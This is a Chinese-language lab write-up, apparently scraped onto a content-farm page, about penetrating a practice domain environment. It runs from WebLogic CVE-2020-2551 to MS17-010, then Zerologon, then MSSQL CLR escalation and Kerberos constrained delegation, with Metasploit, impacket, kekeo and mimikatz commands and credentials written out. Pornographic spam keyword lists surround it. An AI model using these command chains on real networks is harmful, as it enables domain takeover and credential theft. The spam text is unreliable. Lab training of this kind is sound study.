日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

一次内网靶场学习记录

發布時間:2025/3/21 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 一次内网靶场学习记录 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

環境搭建

web服務器:

外網IP 192.160.0.100

內網IP 10.10.20.12

域內機器win7 :

內網IP 10.10.20.7

內網IP 10.10.10.7

域內服務器 Mssql:

內網IP 10.10.10.18

域控機器:

內網IP 10.10.10.8

→點擊查看技術資料←

1.2000多本網絡安全系列電子書
2.網絡安全標準題庫資料
3.項目源碼
4.網絡安全基礎入門、Linux、web安全、攻防方面的視頻
5.網絡安全學習路線圖

外網滲透

端口掃描
搭建好環境,對目標192.168.0.100進行端口掃描探測

目錄掃描
發現目標開放了7001端口,進行目錄掃描探測,發現weblogic登錄口

weblogic漏洞利用

嘗試weblogic弱口令登錄不成功

通過weblogic漏洞利用工具,發現目標存在CVE-2020-2551漏洞可以利用

出網探測
ping www.baidu.com發現目標機器出網

殺軟識別
tasklist /svc 通過進程對比發現主機上沒有安裝殺軟

直接powershell上線cs

內網滲透

信息搜集
通過執行命令whoami /all發現存在雙網卡

密碼憑據抓取
通過hashdump抓取密碼Administrator ccef208c6485269c20db2cad21734fe7

ntlm hash值為ccef208c6485269c20db2cad21734fe7,通過cmd5解出明文密碼Admin12345

橫向移動
有了明文密碼我們可以進行遠程登陸,但真實環境中不到萬不得已一般不建議執行此操作,因此尋找其他的方法進行內網橫向移動

通過上傳fscan掃描10網段,發現存在ms17-010漏洞的10.10.20.7主機

一開始打算通過Eternalblue直接上線cs,發現不成功,改用其他方法

項目地址:https://github.com/0xFenrik/Eternalblue

隧道搭建
上傳frp搭建隧道代理

[common]#frpc配置 server_addr = VPS地址 server_port = 7000 [plugin_socks] type = tcp remote_port = 1080 plugin = socks5[common]#frps配置 bind_addr =0.0.0.0 bind_port = 7000

永恒之藍ms17-010
改用metaspolit,調用永恒之藍模塊進行攻擊,成功獲取shell

msf6 > setg Proxies socks5:frps服務端IP:監聽端口 msf6 > setg ReverseAllowProxy true msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set payload windows/x64/meterpreter/bind_tcp msf6 > set rhost 10.10.20.7 msf6 > run

或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080

然后通過proxychains msfconsole啟動

成功后通過mimikatz執行creds_all獲取賬戶密碼redteam\saul:admin!@#45

中轉上線
由于目標機器win7不出網,因此以跳板機器作為中轉,新建一個監聽器

通過psexec進行上線

成功上線后進行內網掃描,探測存活主機,發現還存在10.10.10.8和10.10.10.18兩臺機器

通過信息搜集發現當前機器是在域環境內net user /domain

定位域控
接著定位到域控 net group “domain controllers” /domain

ps:一般來說DNS服務器就是域控

CVE-2020-1472

影響版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)

通過CVE-2020-1472腳本進行檢測

項目地址:https://github.com/SecuraBV/CVE-2020-1472

1、重置管理員密鑰,進行置空

python3 cve-2020-1472-exploit.py OWA 10.10.10.8

2、通過 Dcsync 查看密碼hash

python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass

3、通過psexec和hash獲取域控權限

python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7


4、使用secretsdump解析保存在本地的nt hash

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

5、通過reinstall腳本將$MACHINE.ACC:plain_password_hex中的原來nt hash恢復

python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d


約束委派接管域控
1、通過adfind尋找約束委派的用戶,發現為sqlserver的機器

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b “DC=redteam,DC=red” -f “(&(samAccountType=805306368)(msds-allowedtodelegateto=*))” cn distinguishedName msds-allowedtodelegateto


2、通過端口探測發現sqlserver為10.10.10.18機器

3、使用fscan進行掃描fscan.exe -h 10.10.10.0/24 sqlserver為弱口令sa/sa


4、使用工具查看當前權限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami

項目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41

5、權限較低,使用以下命令進行提權:

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami


6、上線CS并抓到sqlserver的密碼redteam\sqlserver Server12345


根據先前的信息搜集可知 sqlserver 是一個約束委派用戶,可以通過約束委派攻擊來接管域控

項目地址:https://github.com/gentilkiwi/kekeo/releases

1、利用 kekeo 請求該用戶的 TGT

kekeo.exe “tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi”

2、然后使用這張 TGT 獲取域機器的 ST

kekeo.exe “tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red”

3、使用 mimikatz 將 ST 導入當前會話,運行 mimikatz 進行 ptt

mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

4、成功獲取域控權限

最后

點擊查看【網絡安全學習資料·攻略】

總結

以上是生活随笔為你收集整理的一次内网靶场学习记录的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 91美女片黄在线观看 | 亚洲成熟丰满熟妇高潮xxxxx | 久久久久久美女 | 久久久青青草 | 潘金莲黄色一级片 | 丰满熟女人妻一区二区三 | 韩国主播青草55部完整 | 亚洲天堂777 | 五月天啪啪 | 国产人妻aⅴ色偷 | 玩日本老头很兴奋xxxx | 国产新婚疯狂做爰视频 | 午夜亚洲成人 | 日日日噜噜噜 | 亚洲午夜精品久久久久久浪潮 | va婷婷| 青青青青青草 | 在线免费观看黄色 | 亚洲AV无码国产成人久久 | 欧美一区二区三区四 | 国产亚洲成av人在线观看导航 | 99久久99久久精品国产片桃花 | 久久综合亚洲精品 | 亚洲成人午夜在线 | 日韩黄色精品 | 在线干| 亚洲精品免费视频 | 国产av天堂无码一区二区三区 | 欧美熟妇精品一区二区蜜桃视频 | 日韩欧美91| 亚洲精品一区二三区不卡 | www.欧美在线观看 | av图片在线观看 | 视频在线观看电影完整版高清免费 | 国产91精品欧美 | 激情av一区| 夜夜天天 | 一级久久久 | 久久性网 | 亚洲欧美高清 | 一级免费观看 | 久久99精品久久久久久 | wwwxx在线 | 精品一级 | а√天堂资源在线 | 日本一区二区三区中文字幕 | 亚洲国产aⅴ精品一区二区的游戏 | 天天看天天做 | 中文字幕免费观看 | 国产美女www爽爽爽视频 | 日本不卡一区二区三区视频 | 成年人在线视频网站 | 欧美激情成人 | 亚洲干| 黑人操中国女人视频 | 人操人爽| 日韩国产三级 | 俺也去网站 | 最新在线黄色网址 | 麻豆影视免费观看 | 一区二区av电影 | 久久精品在线视频 | 爱情岛亚洲首页论坛 | 日韩毛片在线视频 | 91丨九色丨蝌蚪丨丝袜 | 久福利 | 羞羞色视频 | 五月婷婷基地 | 一边摸一边抽搐一进一出视频 | 日日cao| 中文字幕一区二区免费 | 日本熟妇一区二区三区 | 午夜剧场在线 | 男受被做哭激烈娇喘gv视频 | 51精品国产人成在线观看 | 人人舔| 天天操天天干天天干 | 19韩国主播青草vip | a级成人毛片 | 性色av一区二区三区免费 | 欧美另类极品videosbest使用方法 | 苏晴忘穿内裤坐公交车被揉到视频 | 国产欧美综合视频 | 性欧美丰满熟妇xxxx性久久久 | 国产综合一区二区 | 亚欧在线视频 | 91调教打屁股xxxx网站 | 国产91看片| 免费看91的网站 | 免费网站观看www在线观看 | 久久久午夜精品福利内容 | 国产精欧美一区二区三区白种人 | 成人在线播放av | 日本欧美另类 | 久久久久久免费视频 | 国产欧美一区二区三区沐欲 | 国产3p露脸普通话对白 | 免费的av在线| 韩国性猛交╳xxx乱大交 |